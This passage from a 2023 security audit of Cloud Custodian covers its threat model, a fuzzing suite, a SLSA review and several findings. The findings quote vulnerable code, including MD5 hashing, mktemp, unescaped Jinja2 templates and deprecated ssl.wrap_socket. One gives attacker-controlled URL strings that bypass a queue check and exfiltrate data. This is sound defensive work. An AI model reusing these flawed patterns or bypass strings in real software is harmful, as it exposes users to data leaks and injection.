creating or modifying cluster resources in such\na way that when Cloud Custodian queries them, Cloud Custodian will behave unexpectedly - possibly in\nan insecure way. This attack vector requires cluster privileges for the attacker, albeit minimum create or\nedit-privileges are sufficient. Cloud Custodian can handle resources insecurely when running policies\nonce or periodically, and a cluster user can craft a resource that causes unexpected behavior in Cloud\nCustodian and triggers security vulnerabilities. This type of attack requires a CLI user to write and/or\ndeploy policies, and the attacker would need to know which Cloud Custodian policies are deployed.\nCloud Custodian users with multiple users of varying vertical permission levels are prone to this attack\nvector. An sample attack would progress as such:\n1. Cluster admin creates a cluster user without create privileges but with edit privileges.\n2. Cluser admin deploys a policy that periodically queries all EC2 instances in the cluster.\n3.The cluster user created in step 1 knows that the policy created in step 2 mishandles an EC2\ninstance with a particular name, and instead of reading the name, it creates 100 new EC2 instances\nCloud Custodian Security Audit 2023 15Cloud Custodian Security Audit 2023 17 apr 2024\nthat are not restricted by any limitations from policies in the cluster. The cluster user creates the\nEC2 instance with the malicious name.\n4.The cluster user has managed to create 100 EC2 instances with their own specifications and has\nthereby succesfully escalated privileges.\nFrom the perspective of a standard Cloud Custodian use case, this is an exposed attack surface, since it\noriginates from an intended way of using Cloud Custodian. Cloud Custodian should be able to handle\na user base with different permission levels without exposing itself to privilege escalations. We note\nthat this attack surface also relies on authorization mechanisms of the underlying cloud platform,\nhowever, this attack surface is exposed to cluster users even when the authorization mechanisms work\nas intended; If the user has permissions to create EC2 instances, they do no need to escalate privileges\nand be able to delete EC2 instances or create S3 buckets in order to exploit a vulnerability in cluster\nresource handling.\nCloud Custodian allows deploying policies that have no immediate effect and are only triggered by\ncertain cloud events, these policies are translated and stored in the cloud as stored actions (lambda\nfunction in AWS) or stored policies in the policy bucket. For example, Cloud Custodian can register\nevent monitoring and trigger in AWS through AWS Cloud Trail surface. If the registered cloud event has\nhappened, the AWS Cloud Trail invokes the stored actions (Lambda functions in AWS) with the details\nof the cloud events. If the stored actions translated from Cloud Custodian policies use some of the\ninformation from the cloud events without proper validation or sanitization, they are vulnerable to\nattacks like injections or Denial-of-service. The actions could also cause unexpected behaviours or\nprivilege escalation if the stored actions are invoked with IAM roles with higher privileges. An attacker\ncould observe or guess the stored and cloud event registered Cloud Custodian policy actions and\nspecifically trigger a cloud event with malicious data. In this situation, the attacker only requires IAM\nroles that have permission to trigger that cloud event and still invoke the stored Cloud Custodian policy\nactions even if those policy actions are executing in different IAM roles.\nAttack surface Description\nCloud\nCustodian CLICloud Custodian CLI is one of the entry points for accepting policies and performing\nactions on the cloud with the user\u2019s IAM roles. Privilege escalation or injection\ntargeting the cloud could go passed an insecure or over-privileged CLI.\nCloud\nCustodian\nPolicyCloud Custodian defines what actions are performed on what resources are in the\ncloud. Attackers could target to trick legitimate users into creating a policy to\ncomplete some unexpected actions in the cloud.\nCloud Custodian Security Audit 2023 16Cloud Custodian Security Audit 2023 17 apr 2024\nAttack surface Description\nCloud\nCustodian\nschemaCloud Custodian schema translates a YAML policy into actions in the Cloud\nenvironment. Adopting third-party or custom schema to Cloud Custodian could\nopen up unexpected translations and perform unexpected actions in the cloud.\nCloud\ntriggering\neventsCloud Custodian allows deploying policies that have no immediate effect and are\nonly triggered by certain cloud events. Changes in the existing cloud events could\ncause unexpected policies to be triggered.\nCloud IAM\nservicesCloud Custodian policies are running with the IAM roles of the user deploying the\npolicies. Over-privileged IAM roles for Cloud Custodian could allow privilege\nescalation on the cloud.\nAttacker objectives\nPrivilege escalation in the cloud\nMost of the privilege management in the cloud is done by IAM services. Attackers may make use of the\nCloud Custodian to escalate its privilege in the cloud if the IAM roles for the Cloud Custodian are not\ncorrectly configured or over-privileged.\nMess up with services and resources of the cloud\nWith enough privilege, the Cloud Custodian could perform almost any action in the cloud. Attackers\nmay make use of the high-privilege IAM role of Cloud Custodian to perform some unexpected actions\nin all other cloud services.\nGain information from the cloud services and resources\nWith enough privilege, the Cloud Custodian could perform almost any action in the cloud. Attackers\nmay make use of the high-privilege IAM role of Cloud Custodian to retrieve information or data in some\nprotected resources.\nCloud Custodian Security Audit 2023 17Cloud Custodian Security Audit 2023 17 apr 2024\nFuzzing\nAs part of the audit, Ada Logics wrote a fuzzing suite for Cloud Custodian consisting of 11 fuzzers\ntargetting primarily resource handling and validation methods for resources from multiple cloud\nproviders that Cloud Custodian supports. In addition, Ada Logics built the infrastructure to suppor\ncontinuous fuzzing; We did that by integrating Cloud Custodian into OSS-Fuzz which is an open-source\nproject created and run by Google that offers automation of different aspects of a healhty fuzzing\nworkflow. This includes running the fuzzers periodically, reporting of found bugs by the fuzzers, testing\nfor bug fixes and more - all done in an automated manner with technical details available for bugs such\nas stack traces and reproducer testcases. A continuous fuzzing setup is an important part of software\nsecurity and upon completion of this audit, Cloud Custodian is fuzzed continuously, even after the\naudit has concluded.\nIn this audit we took the high level approach of adding coverage to validation, processing and parsing\nroutines to resource types, actions and filters. This resulted in multiple alike fuzzers organized by\nprovider or subdirectories. The goal was to add coverage to class methods that processing input, which\nfor some classes has higher complexity than others. Some of the calls in the fuzzers are to methods in\nCloud Custodian that are not complex compared to other classes. Nonetheless, we added coverage\nto those methods to add as much coverage to validation, processing and parsing as time permitted\nin this audit. The fuzzing work done by Ada Logics in this audit was Cloud Custodians first step into\nadding fuzzing its codebase, and adding coverage was the main priority of our fuzzing work.\nAll fuzzers can be found in Cloud Custodians OSS-Fuzz project folder: https://github.com/google/oss-\nfuzz/tree/master/projects/cloud-custodian. OSS-Fuzz builds builds the fuzzers using its Dockerfile and\nbuild script. The Dockerfile moves the fuzzers to the Docker environment at build time, and the\nbuild script builds the fuzzers.\nThese are the fuzzers, we have written during the audit:\nfuzz_actions_parser\nThis fuzzers adds coverage for the parse method of the ActionRegistry class.\nfuzz_actions_process\nThis fuzzer tests the process methods of multiple actions classes: 1) AutoTagUser , 2)Notify ,\n3)LambdaInvoke , 4)Webhook , 5)AutoScalingBase and 6) PutMetric . In each fuzz iteration,\nthe fuzzer will choose the class to test, create an object of the class using the data from the fuzzer and\ninvoke the objects process method. For AutoTagUser andNotify , the fuzzer will first validate\nthe object before invoking their process method.\nCloud Custodian Security Audit 2023 18Cloud Custodian Security Audit 2023 17 apr 2024\nfuzz_actions_validate\nThis fuzzer targets the validate methods of 3 classes of the c7n/actions sub directory: 1)\nAutoTagUser , 2)ModifyVpcSecurityGroupsAction and 3) Notify . The fuzzer chooses\nwhich class to create an object from in each iteration and creates and object using the fuzz testcase.\nFinally, the fuzzer invokes the objects validate method.\nfuzz_filters_parser\nTests the parsing routines of the c7n/filters subdirectory. This includes the parse methods of\ntheFilterRegistry class, as well as multiple parsers from the offhours filter. The fuzzer decides\nwhether to fuzz either the FilterRegistry parse method or two parse methods of the offhours\nfilter in each fuzz iteration.\nfuzz_filters_process\nTests the process methods of the core filters (the c7n/filters subdirectory). The fuzzer tests\nin total 12 classes, and picks one to test in each iteration. The fuzzer creates an object of the\npicked class using the fuzz testcase. When invoking the process method, the fuzzer will pass a\ndictionary The 12 classes that the fuzzer tests the process methods of are: 1) MultiAttrFilter ,\n2)Missing , 3)OnHour , 4)OffHour , 5)SubnetFilter , 6)NetworkLocation , 7)Diff , 8)\nConsecutiveAwsBackupsFilter , 9)HealthEventFilter , 10) HasStatementFilter ,\n11)CrossAccountAccessFilter and 12) AccessAnalyzer . The fuzzer passes a series of\nresources to the process method of each object. This tests for edge cases in resources that could\nimpact Cloud Custodian in a negative way concerning both its security and reliability. For selected\nclasses, the fuzzer will validate the object before invoking its process method which mimicks Cloud\nCustodian production use case.\nfuzz_filters_validate\nTests the validate methods of 10 filters classes located in the c7n/filters subdirectory of\nthe Cloud Custodian source tree. These are the same classes that invoke their validate method\nbefore their process method in the fuzz_filters_process , however this fuzzer is more focused\non validation.\nCloud Custodian Security Audit 2023 19Cloud Custodian Security Audit 2023 17 apr 2024\nfuzz_gcp_actions_validate_process\nTests validation and processing routines of four classes from the c7n_gcp tool.c7n_gcp enables\nGCP support in Cloud Custodian, and in this fuzzer we implement similar testing logic to the fuzzers\ntesting the validation and processing of the core Cloud Custodian classes.\nfuzz_gcp_filters_validate_process\nTests the validation and processing of GCP resources. The fuzzer instantiates a resource using\nthe testcase of each iteration and invokes its process method. It validates four of the re-\nsource types before invoking their process method. The fuzzer tests the following resource\ntypes: 1) LabelActionFilter , 2) RecommenderFilter , 3) GCPMetricsFilter , 4)\nSecurityComandCenterFindingsFilter , 5)TimeRangeFilter , 6)IamPolicyFilter\nand 7) AlertsFilter . The fuzzer instantiates a resource manager and add an ActionRegistry\nand a FilterRegitry to it.\nfuzz_gcp_resources_process\nTests the processing of GCP-specific classes, specifically 1) ServerConfig , 2)SQLInstance ,\n3)KmsLocationKmsKeyringFilter , 4) EffectiveFirewall , 5) HierarchyAction\nand 6) AccessApprovalFilter . In each fuzz iteration, the fuzzer creates one object of either\nof the 6 classes using the fuzzers testcase to instantiate the object. Next, the fuzzer sets up a\nResourceManager and adds an ActionRegistry and a FilterRegistry . Finally, the fuzzer\ninvokes the objects process method catching exceptions that the fuzzer should not report.\nfuzz_query_parser\nThis fuzzer tests two parsers: 1) QueryParser and 2) C7NJMESPathParser - both from the util\nmodule. The fuzzer passes a unicode string of maximum 1024 in length.\nfuzz_resources_parser\nThis fuzzer tests 5 parsing routines: 1) Cloud Custodians aws Arn parser, 2) the ec2 QueryFilter parser, 3)\nthe health QueryFilter parser, 4) the sagemaker QueryFilter and 5) the emr QueryFilter .\nThe fuzzer invokes one of the parsing routines in each fuzz iteration with a unicode string.\nCloud Custodian Security Audit 2023 20Cloud Custodian Security Audit 2023 17 apr 2024\nfuzz_resources_process\nTests the process methods of almost 60 core resource types. The fuzzer first selects a resource type,\nthen creates an object of that type using the fuzzers input test case to generate a pseudo-random\nobject. Finally the fuzzer invokes the objects process method.\nfuzz_resources_validate\nTests the validate methods of almost 60 core resource types. The fuzzer first selects a resource\ntype, then creates an object of that type using the fuzzers input test case to generate a pseudo-random\nobject. Finally the fuzzer invokes the objects validate method.\nCloud Custodian Security Audit 2023 21Cloud Custodian Security Audit 2023 17 apr 2024\nSLSA review\nADA Logics carried out a SLSA review of Cloud Custodian. SLSA (https://github.com/slsa.dev) is a\nframework for assessing the security practices of a given software-project with a focus on mitigating\nsupply-chain risk. SLSA emphasises tamper resistance of artifacts as well as ephemerality of the build\nand release cycle.\nSLSA mitigates a series of attack vectors in the software development life cycle (SDLC) all of which\nhave seen real-world examples of succesful attacks against open-source and proprietary software.\nBelow we see a diagram made by the SLSA illustrating the attack surface of the SDLC.\nFigure 3: Data flow for Cloud Custodian to register triggering criteria for policies\nEach of the red markers should different areas of possible compromise that could allow attackers to\ntamper with the artifact that the consumer invokes at the end of the SDLC.\nSLSA splits its assessment criteria into 4, increasingly demanding levels. At a high level, the higher the\nlevel of compliance, the higher tamper-resistance the project ensures its consumers.\nCloud Custodian releases its binaries on Github Actions using .github/workflows/release.yml. Github\nActions fulfills a number of criteria of SLSA. Github Actions provisions a fresh build environment for\nevery build thereby fulfilling SLSAs requirement of isolation and hermeticity. These are great, and\nimportant features of a hardened build platform. The current version of SLSA emphasises these features\nof the build platform, but projects must have a provenance available to conform to SLSA Level 1. Cloud\nCustodian does not currently include a provenance statement with releases, and as such is currently at\nSLSA L0.\nCloud Custodians most important task in terms of SLSA compliance is to add a provenance statement\nto releases and gradually improve compliance of that provenance statement to higher levels of SLSA,\nCloud Custodian Security Audit 2023 22Cloud Custodian Security Audit 2023 17 apr 2024\nsuch as making it verifiable. We recommend adding this using SLSAs slsa-github-generator (https:\n//github.com/slsa-framework/slsa-github-generator).\nCloud Custodian Security Audit 2023 23Cloud Custodian Security Audit 2023 17 apr 2024\nFound issues\nHere we present the issues that we identified during the audit.\n# ID Title Severity Fixed\n1 ADA-CC-2023-1 Use of a broken or weak\ncryptographic hashing algorithm for\nsensitive dataLow No\n2 ADA-CC-2023-2 Insecure temporary file creation Informational Yes\n3 ADA-CC-2023-3 Missing sanitisation in using Jinja2\nlibraryLow No\n4 ADA-CC-2023-4 Using deprecated and insecure\nssl.wrap_socketLow No\n5 ADA-CC-2023-5 Index out of range in ARN parser Informational Yes\n6 ADA-CC-2023-6 Improper URL substring validation\ncan leak dataLow Yes\n7 ADA-CC-2023-7 Possible DoS from\nattacker-controller Github accountLow Yes\n8 ADA-CC-2023-8 Possible DoS from\nattacker-controller Github\nrepositoryLow Yes\n9 ADA-CC-2023-9 Possible zip bomb from large S3\nobjectModerate No\n10 ADA-CC-2023-10 Privilege escalation through chained\nLambda functions in AWSModerate No\nCloud Custodian Security Audit 2023 24Cloud Custodian Security Audit 2023 17 apr 2024\nUse of a broken or weak cryptographic hashing algorithm for sensitive\ndata\nSeverity Low\nStatus Reported\nid ADA-CC-2023-1\nComponent c7n resources\nget_finding function and get_item_template function uses some weak cryptographic hashing algo-\nrithms like MD5 or SHA-1. Some of these usages are used for non-sensivite data, however, they might\nstill have a minor impact of a potential attack vector. The get_item_template function uses MD5 to\ncalculate a debup token for retrieving an item template for local storage or codebase for further pro-\ncessing. The weak MD5 hash allows a 2nd preimage attack which could make an attacker create another\ninput that can produce the same hash and replace the original item template (or replace what item\ntemplate is to be returned) for further processing, which may cause unexpected execution results.\nget_finding function uses MD5 on policies to determine a finding_id in post finding operations of\nAWS security hubs function. Cloud Custodian can generate a policy to provision a lambda function\nthat will process findings from AWS resources and act on them when certain criteria are matched. For\nexample, it could process findings from AWS guard duty on all IAM users to remove their access keys if\nthe key exists when not allowed. These policies generate a data set called findings to record the\ndetails of the target that needs to perform actions (or further monitored) on IAM resources. The code\nbelow uses the MD5 hashes of the policies data for the finding generation operation as its finding_id .\nThis setting is vulnerable because an attacker could create different policies with the same hash in\norder to pretend it is the designated policy and thus result in incorrect finding target to be processed\nby future actions or periodic triggers.\nhttps://github.com/cloud-custodian/cloud-custodian/blob/d458f0a/c7n/resources/securityhub.py#L525-\nL530\n525 def get_finding(self, resources, existing_finding_id, created_at,\nupdated_at):\n526...\n527\n528 ifexisting_finding_id:\n529 finding_id = existing_finding_id\n530 else :\nCloud Custodian Security Audit 2023 25Cloud Custodian Security Audit 2023 17 apr 2024\n531 ...\n532 finding_id = '{}/{}/{}/{} '.format(\n533 self.manager.config.region,\n534 self.manager.config.account_id,\n535 # we use md5 for id, equiv to using crc32\n536 hashlib.md5( # nosec nosemgrep\n537 json.dumps(policy.data).encode( 'utf8 '),\n538 **params).hexdigest(),\n539 hashlib.md5( # nosec nosemgrep\n540 json.dumps(list(sorted([r[model.id] for r in\nresources]))).encode( 'utf8 '),\n541 **params).hexdigest()\n542 )\n543 finding = {\n544 ...\n545 'Id': finding_id,\n546 ...\n547 }\n548 ...\n549 return filter_empty(finding).\nhttps://github.com/cloud-custodian/cloud-custodian/blob/d458f0a/c7n/resources/ssm.py#L553\n553 def get_item_template(self):\n554 ...\n555 dedup = hashlib.md5(dedup).hexdigest()[:20] # nosec nosemgrep\n556 ...\nMitagation\nChange the use of hashlib.md5 for the more secure hashing algorithms, like sha3 orshake based\nalgorithm.\nCloud Custodian Security Audit 2023 26Cloud Custodian Security Audit 2023 17 apr 2024\nInsecure temporary file creation\nSeverity Informational\nStatus Fixed\nid ADA-CC-2023-2\nComponent ops/azure/container-host-chart\nThe deploy chart operation of Azure uses using deprecated code tempfile.mktemp() method\nwhich creates possible race condition attacks. The tempfile.mktemp() method is deprecated\nbecause it could create a race condition vulnerability, as mentioned by the official python tempfile\nlibrary documentation. The tempfile.mktemp() method is divided into two steps. It first generates\na random temporary filename and then creates the file with the newly generated temporary filename.\nSome other process could create a file in between the two steps of the mktemp() function with\nthe same name generated by the first step of the mktemp() function. This creates a race condition\nsituation and could result in unexpected results when later code accesses the created temp files.\nAttackers are able to make the chart write to a symbolic link with the same path that points to some\nsensitive files in the local storage with the privilege of the Cloud Custodian tool. In addition, attackers\ncould also deny chart writing by changing the permissions of the temp files or inject malicious content\ninto the temp files if they successfully generate a file with their own privilege before mktemp() function\ndoes.\nVulnerable code location\nThe write_values_to_file in deploy_chart.py of Azure provider uses a deprecated python functions\ntempfile.mktemp() which make the code vulnerable to race condition attack.\n97@staticmethod\n98 def write_values_to_file(values):\n99 values_file_path = tempfile.mktemp(suffix= '.yaml ')\n100 with open(values_file_path, 'w') as values_file:\n101 yaml.dump(values, stream=values_file)\n102 return values_file_path\nCloud Custodian Security Audit 2023 27Cloud Custodian Security Audit 2023 17 apr 2024\nMitigation\nThe race condition vulnerability exists because the tempfile.mktemp() function divides the ran-\ndom temporary filename generation and the creation of the temporary file into two steps. To solve this\nvulnerability, just combine the two steps together by generating the file immediately. This could be\ndone by custom logic or replacing tempfile.mktemp() with the newer tempfile.mkstemp()\nfunction which uses the steps combining approach.\nCloud Custodian Security Audit 2023 28Cloud Custodian Security Audit 2023 17 apr 2024\nMissing sanitisation in using Jinja2 library\nSeverity Low\nStatus Reported\nid ADA-CC-2023-3\nComponent c7n mailer\nIn the utils.py of the c7n_mailer tool, the logics use the Jinja2 library to render an HTML email template.\nThe functions get_message_subject andget_jinja_env take in email message parameters\nand path for the email template directory as input and use the Jinja2 library to create and render\nthe HTML email template and email subject. The functions are triggered when a policy-registered\nevent has happened and notify actions are required. The parameters passing to the functions are\nconfigurable by the policy owner and other cloud users who have access to either the environment\nor the resources linked to the registered event. Thus it could contain untrusted data and result in\npossible HTML injection and lead to possible cross-site scripting (XSS) when malicious data is being\nattached to the template or environment variables. According to the documentation of Jinja2, the\ndefault configuration for their Template designer does not have automatic HTML escaping because it\nmay be a huge performance hit if it needs to escape all variables, including some variables that are not\nHTML. In addition, the logic in the utils.py of the c7n_mailer tool does not enable HTML escaping\nby default when using the Jinja2 package nor manually escaping the variable from the Jinja2. Thus it\nresults in possible HTML injection.\nThe get_message_subject function in utils.py of the c7n_mailer tool uses jinja2 library without\nHTML escaping.\n134 def get_message_subject(sqs_message):\n135 ...\n136 jinja_template = jinja2.Template(subject)\n137 subject = jinja_template.render(\n138 account=sqs_message.get(\"account\", \"\"),\n139 account_id=sqs_message.get(\"account_id\", \"\"),\n140 partition=sqs_message.get(\"partition\", \"\"),\n141 event=sqs_message.get(\"event\", None),\n142 action=sqs_message[\"action\"],\n143 policy=sqs_message[\"policy\"],\n144 region=sqs_message.get(\"region\", \"\"),\n145 )\n146 return subject\nCloud Custodian Security Audit 2023 29Cloud Custodian Security Audit 2023 17 apr 2024\nThe get_jinja_env function in utils.py of the c7n_mailer tool uses jinja2 library without HTML\nescaping.\n64def get_jinja_env(template_folders):\n65 env = jinja2.Environment(trim_blocks=True, autoescape=False)\n66 ...\n67 env.loader = jinja2.FileSystemLoader(template_folders)\n68 return env\nMitigation\nThe main problem of this vulnerability is the missing HTML escaping and validation before using the\nrendered result. One possible solution is to turn on the automatic HTML escaping when using the\njinja2 library but it could create a large overhead if the template is large. The other way is adding logic\nbefore the use of the Jinja2 library to escape all HTML-related parameters before passing them to the\nJinja2 library to ensure all of them are correctly sanitized before using them for HTML rendering.\nCloud Custodian Security Audit 2023 30Cloud Custodian Security Audit 2023 17 apr 2024\nUsing deprecated and insecure ssl.wrap_socket\nSeverity Low\nStatus Reported\nid ADA-CC-2023-4\nComponent c7n kube\nSSL versions 2 and 3 are considered insecure and completely broken. Therefore it is dangerous to\nuse. Because of that, the ssl.wrap_socket() function is deprecated as it defaults to an insecure\nversion of SSL/TLS and does not specify a minimum supporting SSL/TLS protocol version. It also does\nnot have support for server name indication (SNI) and hostname matching. An attacker could force it\nto create an SSL/TLS session with broken SSL protocol versions by a downgrade attack, claiming that\nonly an insecure version of SSL is supported during the handshake process. Besides, attackers can\nspoof the hostname/server name and cause the later communication and connection vulnerable to\nattacks. This makes the use of ssl.wrap_socket() for creating SSL socket connection insecure\nand vulnerable to different kinds of attacks on insecure and broken SSL/TLS protocol versions.\nVulnerable code location\nThe get_finding function in server.py of Cloud Custodian Kubernetes provider uses the deprecate\nfunction ssl.wrap_socket() .\n196 def get_finding(self, resources, existing_finding_id, created_at,\nupdated_at):\n197...\n198 server.socket = ssl.wrap_socket(\n199 server.socket,\n200 server_side=True,\n201 certfile=cert_path,\n202 keyfile=cert_key_path,\n203 ca_certs=ca_cert_path,\n204 )\nMitigation\nThe deprecated ssl.wrap_socket() function should be replaced by the newer ssl.\nSSLContext.wrap_socket() function. This new function returns an SSLContext object,\nCloud Custodian Security Audit 2023 31Cloud Custodian Security Audit 2023 17 apr 2024\nencapsulating the settings and enforcing SNI and hostname matching with default disabling of inse-\ncure SSL/TLS version. That could deny possible downgrade attacks or hostname/server name spoofing.\nIf no specific security policies or requirements are needed, ssl.create_default_context()\nfunction could be used to create a default SSLContext object without the need to specify the security\nconfigurations.\nRemark\nAs the new ssl.SSLContext.wrap_socket() only supports Stream type socket, thus transfer-\nring the use of ssl.wrap_socket() may not be a trivial task to do so.\nCloud Custodian Security Audit 2023 32Cloud Custodian Security Audit 2023 17 apr 2024\nIndex out of range in ARN parser\nSeverity Informational\nStatus Fixed\nid ADA-CC-2023-5\nComponent arn parser\nCloud Custodians ARN is susceptible to an index out of range issue from a string split and an assumed\narray-length. This is a cosmetic issue, since ARNs are never user supplied. Nevertheless, fixing the issue\navoids issues in the future in case the use case of the code containing the issue changes. In addition,\nfixing the issue also allows the fuzzer to reason about the code without getting blocked by a cosmetic\nbug.\nThe issue exists on the following lines:\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\ne20591d4203257652e2de29e237479e81e958ab4/c7n/resources/aws.py#L298-L305\n298 def parse(cls, arn):\n299 ifisinstance(arn, Arn):\n300 return arn\n301 parts = arn.split( ':', 5)\n302 # a few resources use qualifiers without specifying type\n303 ifparts[2] in ( 's3','apigateway ','execute-api ','emr-\nserverless '):\n304 parts.append(None)\n305 parts.append(None)\nOn line 303, the parser reads the third index of the array, however, there can be fewer than three\nelements in the array.\nThis issue was found by the ARN parser fuzzer.\nMitigation\nWe recommend checking that there is a third element in the array before reading it.\nCloud Custodian Security Audit 2023 33Cloud Custodian Security Audit 2023 17 apr 2024\nImproper URL substring validation can leak data\nSeverity Low\nStatus Fixed\nid ADA-CC-2023-6\nComponent c7n\nCloud Custodians base notifier is susceptible to an improper URL string validation which may allow an\nattacker to trick Cloud Custodian into leaking data by sending messages to URLs under the attackers\ncontrol. The issue allows an attacker who can add items to the transport queue to control the URL\nthat the base notifier sends payloads to. Besides the potential for leaking data, an attacker could also\nmanipulate subsequent workflow by crafting a malicious response to Cloud Custodian.\nThe issue requires high privileges to exploit: Permissions to deploy policies are necessary.\nThe issue exists in send_sqs() ofBaseNotifier :\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\nd458f0a24629b5f01160568ef96e728744dc9bbc/c7n/actions/notify.py#L383-L419\n383 def send_sqs(self, message, payload):\n384 queue = self.data[ 'transport ']['queue '].format(**message)\n385 ifqueue.startswith( 'https://queue.amazonaws.com '):\n386 region = 'us-east-1 '\n387 queue_url = queue\n388 elif 'queue.amazonaws.com 'in queue:\n389 region = queue[len( 'https:// '):].split( '.', 1)[0]\n390 queue_url = queue\n391 elif queue.startswith( 'https://sqs. '):\n392 region = queue.split( '.', 2)[1]\n393 queue_url = queue\n394 elif queue.startswith( 'arn: '):\n395 queue_arn_split = queue.split( ':', 5)\n396 region = queue_arn_split[3]\n397 owner_id = queue_arn_split[4]\n398 queue_name = queue_arn_split[5]\n399 queue_url = \"https://sqs.%s.amazonaws.com/%s/%s\" % (\n400 region, owner_id, queue_name)\n401 else :\n402 region = self.manager.config.region\n403 owner_id = self.manager.config.account_id\n404 queue_name = queue\nCloud Custodian Security Audit 2023 34Cloud Custodian Security Audit 2023 17 apr 2024\n405 queue_url = \"https://sqs.%s.amazonaws.com/%s/%s\" % (\n406 region, owner_id, queue_name)\n407 client = self.manager.session_factory(\n408 region=region, assume=self.assume_role).client( 'sqs')\n409 attrs = {\n410 'mtype ': {\n411 'DataType ':'String ',\n412 'StringValue ': self.C7N_DATA_MESSAGE,\n413 },\n414 }\n415 result = client.send_message(\n416 QueueUrl=queue_url,\n417 MessageBody=payload,\n418 MessageAttributes=attrs)\n419 return result[ 'MessageId ']\nThe issue lies in the two first branches of send_sqs . Assuming that an attacker can control the queue\nvariable defined on line 384, they can get past the first conditional check on line 385-387 if queue\ndoes not start with the string https://queue.amazonaws.com . The second conditional checks\nwhether queue.amazonaws.com is a substring of queue . An attacker can bypass that in a number\nof ways, either by crafting a subdomain of their own domain, for example queue.amazonaws.\ncom.malicious-url.cc , or by including a URL parameter, for example: malicious-url.cc?\nqueue.amazonaws.com . The conditional check on line 388 will return true and queue_url will\nbe assigned the attackers URL. send_sqs will proceed to line 407, and the client will sent the message\nto the attacker-controlled URL on line 416.\nMitigation\nImprove URL sanitization of the queue value. For example, remove the labeling part of the URL to\nensure that only the needed domain is included in send_sqs . Splitting the string into domain and\npath before checking could also help.\nCloud Custodian Security Audit 2023 35Cloud Custodian Security Audit 2023 17 apr 2024\nPossible DoS from attacker-controller Github account\nSeverity Low\nStatus Fixed\nid ADA-CC-2023-7\nComponent c7n policystream\nCloud Custodians PolicyStream tool is vulnerable to an infinity loop from an attacker-controlled limit\nin a for loop. The root cause is that the Policy Stream tool loops through all repositories belonging to\nan organization without setting a limit to the number of iterations. The repositories are remote and an\npotential attacker has numerous ways to control the list of repositories returned to Cloud Custodian. If\nthey can achieve a position where they control the list of repositories returned to Cloud Custodian,\nthey could cause Cloud Custodian to go into an infinity loop and thereby cause a denial of service.\nThe root cause of the issue is in the org_checkout CLI call. This API loops through all repositories of\nan organization and applies filtering in each iteration:\nhttps://github.com/cloud-custodian/cloud-custodian/blob/e425311da975e9d03e69f4d33bfeec7ebe65f932/\ntools/c7n_policystream/policystream.py#L743-L786\n743 def org_checkout(organization, github_url, github_token, clone_dir,\n744 verbose, filter, exclude):\n745 \"\"\"Checkout repositories from a GitHub organization.\"\"\"\n746 logging.basicConfig(\n747 format=\"%(asctime)s: %(name)s:%(levelname)s %(message)s\",\n748 level=(verbose and logging.DEBUG or logging.INFO))\n749\n750 callbacks = pygit2.RemoteCallbacks(\n751 pygit2.UserPass(github_token, 'x-oauth-basic '))\n752\n753 repos = []\n754 for r in github_repos(organization, github_url, github_token):\n755 iffilter:\n756 found = False\n757 for f in filter:\n758 iffnmatch(r[ 'name '], f):\n759 found = True\n760 break\n761 ifnot found:\n762 continue\n763\nCloud Custodian Security Audit 2023 36Cloud Custodian Security Audit 2023 17 apr 2024\n764 ifexclude:\n765 found = False\n766 for e in exclude:\n767 iffnmatch(r[ 'name '], e):\n768 found = True\n769 break\n770 iffound:\n771 continue\n772\n773 repo_path = os.path.join(clone_dir, r[ 'name '])\n774 repos.append(repo_path)\n775 ifnot os.path.exists(repo_path):\n776 log.debug(\"Cloning repo: %s/%s\" % (organization, r[ 'name '])\n)\n777 repo = pygit2.clone_repository(\n778 r['url'], repo_path, callbacks=callbacks)\n779 else :\n780 repo = pygit2.Repository(repo_path)\n781 ifrepo.status():\n782 log.warning( 'repo %s not clean skipping update ', r[ '\nname '])\n783 continue\n784 log.debug(\"Syncing repo: %s/%s\" % (organization, r[ 'name '])\n)\n785 pull(repo, callbacks)\n786 return repos\nAn attacker could obtain control over the Github organization in a number of ways; For example, the\nowner of the github organization may not be using proper configuration such as 2FA and permission\nlevels, and an attacker could compromise the Github organization and launch the attack. Alternatively,\nan attacker pretend to be a legitimate contributor over a longer time, make legitimate contributions,\nreview pull requests etc to build up credibility. The attacker could then choose to launch the attack\nat a the most lucrative time. The attack could be against a competitor with the goal of achieving a\ntime-advantage in certain operations such as research, business, trading or military operations. These\nare examples that illustrate the Cloud Custodian does not control the data coming from the remote\ngithub repository, whereas fully untrusted users may be able to control it. As such, the data from the\nremote repositories can be fully untrusted.\nThe attack is also possible without creating the repositories, if the attacker can intercept communica-\ntion and control the response returned to Cloud Custodian on these lines: https://github.com/cloud-\ncustodian/cloud-custodian/blob/e425311da975e9d03e69f4d33bfeec7ebe65f932/\ntools/c7n_policystream/policystream.py#L665C9-L666\nIn the attacker can control these lines, they can control the JSON that Cloud Custodian uses to create\ntherepos variable. Cloud Custodian does not validate whether the repo belongs to the organization\nwhen invoking the loop:\nCloud Custodian Security Audit 2023 37Cloud Custodian Security Audit 2023 17 apr 2024\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\ne425311da975e9d03e69f4d33bfeec7ebe65f932/tools/c7n_policystream/policystream.py#L754-\nL771\n754 for r in github_repos(organization, github_url, github_token):\n755 iffilter:\n756 found = False\n757 for f in filter:\n758 iffnmatch(r[ 'name '], f):\n759 found = True\n760 break\n761 ifnot found:\n762 continue\n763\n764 ifexclude:\n765 found = False\n766 for e in exclude:\n767 iffnmatch(r[ 'name '], e):\n768 found = True\n769 break\n770 iffound:\n771 continue\nAn attacker could therefore return a JSON response pointing to repositories from other Github accounts\nand achieve the same goal.\nMitigation\nWe recommend resolving all of the below: 1. Either add a counter to each loop iteration and stop after\namaxAllowed limit or check the number of repositories before starting the loop. 2. Validate in the\nbeginning of the loop whether each repository belongs to the organization.\nCloud Custodian Security Audit 2023 38Cloud Custodian Security Audit 2023 17 apr 2024\nPossible DoS from attacker-controller Github repository\nSeverity Low\nStatus Fixed\nid ADA-CC-2023-8\nComponent c7n policystream\nCloud Custodians PolicyStream tool is vulnerable to an infinity loop from an attacker-controlled limit in\na loop. The root cause is that the Policy Stream tool loops through all commits in a repository without\nsetting a limit to the number of iterations. The repository is cloned from remote and a potential attacker\nhas numerous ways of controlling it and thereby the number of commits it has. If they can achieve a\nposition where they control the repository and create a high number of commits, they could cause\nCloud Custodian to go into an infinity loop and thereby cause a denial of service, since Cloud Custodian\nwould not terminate its operation and would not be able to process subsequent operations.\nThe root cause of the issue is in the delta_stream CLI call. This API loops through all commits of a\nbranch of a 